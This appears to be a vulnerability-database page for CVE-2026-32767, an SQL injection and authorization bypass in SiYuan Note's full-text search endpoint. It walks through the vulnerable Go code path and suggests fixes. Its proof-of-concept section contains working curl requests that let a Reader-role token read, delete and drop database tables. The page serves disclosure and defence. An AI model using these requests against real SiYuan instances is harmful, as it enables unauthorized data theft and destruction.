Skip to main content

Docker CVE-2026-32767

CRITICAL
SQL Injection (CWE-89)
2026-03-16 https://github.com/siyuan-note/siyuan GHSA-j7wh-x834-p3r7
9.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SUSE
CRITICAL
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Analysis Generated
Mar 16, 2026 - 20:56 vuln.today
CVE Published
Mar 16, 2026 - 20:44 nvd
CRITICAL 9.8

DescriptionGitHub Advisory

Summary

SiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user - including those with the Reader role - to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database.

This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely.

Root Cause Analysis

The Vulnerable Endpoint

File: kernel/api/router.go, line 188

go
ginServer.Handle("POST", "/api/search/fullTextSearchBlock", model.CheckAuth, fullTextSearchBlock)

This endpoint only applies model.CheckAuth, which permits any authenticated role (Administrator, Editor, or Reader).

The Properly Protected Endpoint (for comparison)

File: kernel/api/router.go, line 177

go
ginServer.Handle("POST", "/api/query/sql", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL)

This endpoint correctly chains CheckAdminRole and CheckReadonly, restricting SQL execution to administrators in read-write mode.

The Vulnerable Code Path

File: kernel/api/search.go, lines 389-411

go
func fullTextSearchBlock(c *gin.Context) {
    // ...
    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)
    blocks, matchedBlockCount, matchedRootCount, pageCount, docMode :=
        model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize)
    // ...
}

File: kernel/model/search.go, lines 1205-1206

go
case 2: // SQL
    blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize)

When method=2, the raw query string is passed directly to searchBySQL().

File: kernel/model/search.go, lines 1460-1462

go
func searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) {
    stmt = strings.TrimSpace(stmt)
    blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize)

File: kernel/sql/block_query.go, lines 566-569, 713-714

go
func SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) {
    parsedStmt, err := sqlparser.Parse(stmt)
    if err != nil {
        return selectBlocksRawStmt(stmt, limit)  // Falls through to raw execution
    }
    // ...
}

func selectBlocksRawStmt(stmt string, limit int) (ret []*Block) {
    rows, err := query(stmt)  // Executes arbitrary SQL
    // ...
}

File: kernel/sql/database.go, lines 1327-1337

go
func query(query string, args ...interface{}) (*sql.Rows, error) {
    // ...
    return db.Query(query, args...)  // Go's database/sql db.Query - executes ANY SQL
}

Go's database/sql db.Query() will execute any SQL statement, including DELETE, UPDATE, DROP TABLE, INSERT, etc. The returned *sql.Rows will simply be empty for non-SELECT statements, but the destructive operation is still executed.

Authorization Model

File: kernel/model/session.go, lines 201-210

go
func CheckAuth(c *gin.Context) {
    // Already authenticated via JWT
    if role := GetGinContextRole(c); IsValidRole(role, []Role{
        RoleAdministrator,
        RoleEditor,
        RoleReader,       // <-- Reader role passes CheckAuth
    }) {
        c.Next()
        return
    }
    // ...
}

File: kernel/model/session.go, lines 380-386

go
func CheckAdminRole(c *gin.Context) {
    if IsAdminRoleContext(c) {
        c.Next()
    } else {
        c.AbortWithStatus(http.StatusForbidden)  // <-- This check is MISSING on the search endpoint
    }
}

Proof of Concept

Prerequisites

  • SiYuan instance accessible over the network (e.g., Docker deployment)
  • Valid authentication as any user role (including Reader)

Steps to Reproduce

  1. Authenticate to SiYuan and obtain a valid session cookie or API token.
  2. Read all data (confidentiality breach):
bash
curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "SELECT * FROM blocks LIMIT 100"}'
  1. Delete all blocks (integrity/availability breach):
bash
curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "DELETE FROM blocks"}'
  1. Drop tables (availability breach):
bash
curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "DROP TABLE blocks"}'
  1. Compare with the properly protected endpoint (should return HTTP 403 for Reader role):
bash
curl -X POST http://<target>:6806/api/query/sql \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"stmt": "SELECT * FROM blocks LIMIT 10"}'

Expected Behavior

The search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with /api/query/sql.

Actual Behavior

Any authenticated user (including Reader role) can execute arbitrary SQL including destructive operations.

Impact

In a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code):

  • Confidentiality: A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to.
  • Integrity: A Reader-role user can modify or delete any data in the database, despite having read-only access by design.
  • Availability: A Reader-role user can drop tables or corrupt the database, rendering the application unusable.

Suggested Fix

Add CheckAdminRole and CheckReadonly middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when method=2:

Option A - Restrict method=2 to admin (recommended):

In kernel/api/search.go, add a role check when method=2:

go
func fullTextSearchBlock(c *gin.Context) {
    // ...
    page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)

    // SQL mode requires admin privileges, consistent with /api/query/sql
    if method == 2 && !model.IsAdminRoleContext(c) {
        ret.Code = -1
        ret.Msg = "SQL search requires administrator privileges"
        return
    }
    // ...
}

Option B - Enforce SELECT-only for non-admin users:

Validate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator.

AnalysisAI

An authorization bypass vulnerability in SiYuan Note v3.6.0 and earlier allows any authenticated user, including those with read-only 'Reader' role privileges, to execute arbitrary SQL commands through the /api/search/fullTextSearchBlock endpoint when the method parameter is set to 2. This enables attackers to read, modify, or delete all data in the application's SQLite database, completely bypassing the application's role-based access controls. A detailed proof-of-concept demonstrates how Reader-role users can execute destructive SQL operations including dropping tables.

Technical ContextAI

The vulnerability affects SiYuan Note (CPE: pkg:go/github.com_siyuan-note_siyuan_kernel), a Go-based note-taking application that uses SQLite for data storage. This is a classic SQL injection vulnerability (CWE-89) where user-supplied input is passed directly to database queries without proper sanitization or authorization checks. The search endpoint fails to implement the CheckAdminRole and CheckReadonly middleware that properly protects the dedicated SQL query endpoint (/api/query/sql), creating an inconsistent security model where SQL execution privileges can be obtained through an alternate code path.

RemediationAI

Upgrade SiYuan Note to a version newer than 3.6.0 once a patch is released that adds proper authorization checks to the /api/search/fullTextSearchBlock endpoint. Until a patch is available, restrict network access to the SiYuan instance to trusted IP addresses only and avoid granting Reader role access to untrusted users in multi-user deployments. For critical deployments, consider temporarily disabling the search API endpoint or implementing a reverse proxy that blocks POST requests to /api/search/fullTextSearchBlock with method=2 in the request body. Monitor the vendor advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7 for patch availability.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: Critical
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-32767 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy